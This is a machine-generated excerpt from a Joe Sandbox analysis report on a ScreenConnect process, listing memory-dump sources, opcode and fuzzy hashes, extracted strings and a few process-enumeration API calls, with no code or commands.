                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 10dffa1eebc0bbcb445d070a05e44b580402de9f02a9d316842603220359abfb
                                                                                                                                                                                                                                                                          • Instruction ID: 91afe6efa19a91a58b134da1fe0f385c737d614cd5b3be88823bb81ff7e6e9a0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10dffa1eebc0bbcb445d070a05e44b580402de9f02a9d316842603220359abfb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F411E370E003449FDB11DF68C800AAFBBB1AFC1710F4584ABD458EB261D7318902CB81
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ff9b7b7114ee536504b8a42269a752a5238e169516488727c7d0e3ae3699f2fa
                                                                                                                                                                                                                                                                          • Instruction ID: ec45302c32f6c0eaeac768967d61d9ad08a4317ed6fbae7a363a1ced1bf3c273
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff9b7b7114ee536504b8a42269a752a5238e169516488727c7d0e3ae3699f2fa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6611CE70F00204AFDB14DB68C800AAFB7B6EFC4710F958466D548E7294D7719902CB91
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e5a9072f91272d0a1f992530129d91b1fe3c2e96c17533b5c8d64a27e84dcf67
                                                                                                                                                                                                                                                                          • Instruction ID: f6edd5c6d8026f98e6bd69199c09f6e42904b484327ab7fa1c9863ece4180a69
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5a9072f91272d0a1f992530129d91b1fe3c2e96c17533b5c8d64a27e84dcf67
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F115E3155004DDBCB05EFA8D584ADDBBB2EF81304B95C456E005AB129D731E947CFA1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7ee2ab59db935dbcbec1878efa05a6f5a9c6de44766a2ed73672cc4fbb6770d0
                                                                                                                                                                                                                                                                          • Instruction ID: 0e246518a5bd3eef7d3e7cb7a32a4e06ca03f769333674f8053c847e049fd02c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ee2ab59db935dbcbec1878efa05a6f5a9c6de44766a2ed73672cc4fbb6770d0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8901F971B182615FDB559B68A8104ABBBEDEFC4214315896BD485DB322DBB1DC07CB80
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 478aef156d496d34f5cd09395c5ae38da2381392d55b5276cf0f85cbceee0fa9
                                                                                                                                                                                                                                                                          • Instruction ID: 37772bff4a5e9086f19aced7be233c6d9bf975aaafd5960a1fd1019f9662aaef
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 478aef156d496d34f5cd09395c5ae38da2381392d55b5276cf0f85cbceee0fa9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4311163590010A9FCF40DFA8D9409DEBBF5FF49314B108556E509BB261D771AE06CB91
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7707a835d56f501543856190101f6b05ef27cc9bf97163155a9cfd79a376f804
                                                                                                                                                                                                                                                                          • Instruction ID: db7e4abaff156a48c110e24881c7afa1c426aa009b2bf12681b7a171a3bc21ce
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7707a835d56f501543856190101f6b05ef27cc9bf97163155a9cfd79a376f804
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101CC346002449FC716EB78D840AAEBBF1DFC4200704C1AFC40EDB265DB31990ACB80
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2281470065.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_9dd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: b9f8032a0ee80883be0d1ea69f492797f50aa2bd6fa6ad19b466abda9fb40fb0
                                                                                                                                                                                                                                                                          • Instruction ID: 95310eeeb484242fe646f4b2bd0672be8f614b82bf8dcaefe6a371fef0fa6ec3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9f8032a0ee80883be0d1ea69f492797f50aa2bd6fa6ad19b466abda9fb40fb0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD01F7310463009AD7209A25CC84B67BF9CEF85364F18C42BED490B386C27D9801CAB1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2281470065.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_9dd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 994b40744c6c50890a844dd1433d2c170241b36459b99756514ce051515fa380
                                                                                                                                                                                                                                                                          • Instruction ID: 35b27bb5276ea7127ba91c6116c1a36ef81e78cf32573ce8549b51b4763d98db
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 994b40744c6c50890a844dd1433d2c170241b36459b99756514ce051515fa380
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101407100E3C09ED7128B258C94B52BFB8EF53224F18C1DBD9888F2A7C2695845C772
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1dd5c0e822a421e3b157bd7ffe5d31fc9a66eea124804169864a1edf50c85837
                                                                                                                                                                                                                                                                          • Instruction ID: 938b5e7a1c065a41058d74874385ea292f2aa48f2972935088bf0820f7aa8f32
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dd5c0e822a421e3b157bd7ffe5d31fc9a66eea124804169864a1edf50c85837
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF08237B1C2045FD719CABEA400A9BBBDDCBC4220B14C47FD54DC3740E931A4008764
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d58a165a45cada773e94b85b3404fbc3b64c29474453836e798753ce41d89881
                                                                                                                                                                                                                                                                          • Instruction ID: 45e9e370aab904dd714a34fe99f631cb0bfeda5f38676021ceeeebfdd297f454
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d58a165a45cada773e94b85b3404fbc3b64c29474453836e798753ce41d89881
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5F0A77691D2846FC716C7B95C50ADB7FED8EC5110704C0BFD04DC3252D8645402CB35
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: aa5b1b6c1b813df13d3fae3f07a2afdc8e788c1f1046b5bb69dadfd804158729
                                                                                                                                                                                                                                                                          • Instruction ID: d5dcdff6e12feee49812bcfc4d4a1bae5ebde4822282e76ad6e1463c6433ccb0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa5b1b6c1b813df13d3fae3f07a2afdc8e788c1f1046b5bb69dadfd804158729
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF02BA009C3D64FC3138BB46CA85C57FE89D071347490ADDD4D08F0A3C66C4497D352
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2d1e12d2c7be9c78a9dbefa5b0a50d81e2bea7361b230def1a71c5931398d205
                                                                                                                                                                                                                                                                          • Instruction ID: 86da12ddb98d9f36f46c16f9c81b146143b122ed45019f0edaf2a6bebb3845e3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d1e12d2c7be9c78a9dbefa5b0a50d81e2bea7361b230def1a71c5931398d205
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28E06D313043905B87155BAE689866E7BDAEBC9626714813EF50AC3351DE664C078761
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ff1c38a70175872bf2501c6c955a6519d638f79985bbbf06ff5886c6f84041b5
                                                                                                                                                                                                                                                                          • Instruction ID: 80e13eb4078bd4ca5e7b077b11b06a166cfedab658b560303c5887105bcfbfff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff1c38a70175872bf2501c6c955a6519d638f79985bbbf06ff5886c6f84041b5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9F0E572B256808FCB02A76859901696BDACF8926D76E85B7F556CF391E324CC428341
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1db77a435cd01714d7f4e0e413bdbb12870e2ea7593883dc23b9c91843122798
                                                                                                                                                                                                                                                                          • Instruction ID: 4e6731ce8673dbf67abb317cbfaf38046cfc8b0a806ddbe92d41c81599e1b3e1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1db77a435cd01714d7f4e0e413bdbb12870e2ea7593883dc23b9c91843122798
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31F0E5753082905FC3065778AC584AD3FA5DECA222314866FE48AC73A1CE748C07C761
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 0dde5e5f6663a7bbcdee46af4e3a4b0289adca31e47d9b7fcf3844c54e754222
                                                                                                                                                                                                                                                                          • Instruction ID: 05c1796cb586773856bd2f741f07b608212951a4c7ed9bcdc65c4370b6a45a87
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dde5e5f6663a7bbcdee46af4e3a4b0289adca31e47d9b7fcf3844c54e754222
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF0A03A3106049B831AB66DE800E9F37E9CFC4610300802ED41ACB364EF21EC0A9B81
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ae39e9d156fa481f27a303d9c470178dc0692349168bb58371e14907e2c69f68
                                                                                                                                                                                                                                                                          • Instruction ID: ca5565194d04fb971642707c6e2a5ffa881d10b741e67a9bd89e36f264fe1bbb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae39e9d156fa481f27a303d9c470178dc0692349168bb58371e14907e2c69f68
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BE04F323043546797146BAEA88862FBADBEBC9662754843EF60EC3341DE759C0643A5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e32393fbadbe1c282bf7cc9faff77be28a60f0721d78eff14d894b2c2dbf1d53
                                                                                                                                                                                                                                                                          • Instruction ID: 0599fd3bd691216adca81a3c6a074b2ed55196d0a764b79c4375cdf8efe72375
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e32393fbadbe1c282bf7cc9faff77be28a60f0721d78eff14d894b2c2dbf1d53
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11E092346592908FC7056BB0995C89D7FF6EF4622130940AAD84A8B232CB398C03CB41
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7314b0bd95d36b0c3e3a22b5c93e251f0288d8f46bcb0fc5a21b369bfdd72a59
                                                                                                                                                                                                                                                                          • Instruction ID: dd3c6b304bd66fa68027b73844d4c2d3736d9f2cdb5df0e727ad4e30340dd539
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7314b0bd95d36b0c3e3a22b5c93e251f0288d8f46bcb0fc5a21b369bfdd72a59
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BE06D30549384AFCB02DBB4EC51A9E7FF5AE42300B0682EED448DB222CA354E069B11
Memory Dump Source
• Source File: 0000000B.00000002.2282392448.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2480000_ScreenConnect.jbxd

Execution Graph

Execution Coverage: 11%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 45
Total number of Limit Nodes: 7

Control-flow Graph
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: $jq$$jq
                                                                                                                                                                                                                                                                          • API String ID: 0-3720491408

Control-flow Graph

[Figure: control-flow graph; legend: Executed / Not Executed]

Strings
Memory Dump Source
• Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: (&jq$(nq
• API String ID: 0-2454636555

Control-flow Graph

[Figure: control-flow graph; legend: Executed / Not Executed]

Strings
Memory Dump Source
• Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: `Qjq$`Qjq
• API String ID: 0-374821722

Control-flow Graph

[Figure: control-flow graph; legend: Executed / Not Executed]

Strings
Memory Dump Source
• Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: $jq$$jq
• API String ID: 0-3720491408

Control-flow Graph

[Figure: control-flow graph; legend: Executed / Not Executed; one node is labeled K32EnumProcesses]

Memory Dump Source
• Source File: 0000000C.00000002.3291313206.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_5550000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

[Figure: control-flow graph; legend: Executed / Not Executed]

Strings
Memory Dump Source
• Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436

APIs
• K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 055548BD
Memory Dump Source
• Source File: 0000000C.00000002.3291313206.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_5550000_ScreenConnect.jbxd
Similarity
• API ID: EnumProcesses
• String ID:
• API String ID: 84517404-0

APIs
• ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0555499E
Memory Dump Source
• Source File: 0000000C.00000002.3291313206.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_5550000_ScreenConnect.jbxd
Similarity
• API ID: ProcessSession
• String ID:
• API String ID: 3779259828-0

APIs
• ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0555499E
Memory Dump Source
• Source File: 0000000C.00000002.3291313206.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_5550000_ScreenConnect.jbxd
Similarity
• API ID: ProcessSession
• String ID:
• API String ID: 3779259828-0

Strings
Memory Dump Source
• Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: (nq
• API String ID: 0-2756854522

Strings
Memory Dump Source
• Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: LRjq
• API String ID: 0-665714880

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: $jq
                                                                                                                                                                                                                                                                          • API String ID: 0-2886413773
                                                                                                                                                                                                                                                                          • Opcode ID: e123e27dfdfda0adb295506a363fcb561522638d9f2ead73478a120a5627a2a6
                                                                                                                                                                                                                                                                          • Instruction ID: f1586be404575686af9d3b474442436c01a32885ccd49014fc9bf9d9c2fef2c2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e123e27dfdfda0adb295506a363fcb561522638d9f2ead73478a120a5627a2a6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A515E30A14719CFCB14EFA4C554AAEBBF2FF45300F1185ADD4166B269EB749D85CB80

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                          • API String ID: 0-1334834377
                                                                                                                                                                                                                                                                          • Opcode ID: fc3a21c377e0fee96747bcfcc606c39385a71779796eac1f2238d59cdb86aff8
                                                                                                                                                                                                                                                                          • Instruction ID: 52dd7ed2839b960929fe38b1b2a0f627bfa3b9396eb1901199b0775399616d1a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc3a21c377e0fee96747bcfcc606c39385a71779796eac1f2238d59cdb86aff8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE411F71B182854FC719EB38A89096E7BEAEF8631071885BED815DB355EF34DD08C790

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: `}q
                                                                                                                                                                                                                                                                          • API String ID: 0-649497449
                                                                                                                                                                                                                                                                          • Opcode ID: 9612ee51217110efa0a53e965d4e140eea94c7d69c4fe5c67fd95d2c1e766619
                                                                                                                                                                                                                                                                          • Instruction ID: 5aabc9402eb580116bcdaa53ebeb8f051c0536fd278dbaab53119f738c9486fc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9612ee51217110efa0a53e965d4e140eea94c7d69c4fe5c67fd95d2c1e766619
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22418C707146068FC764EB38D994A6E77E2EF89300B2484A9D906CB3A5EF35DE45CB80
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
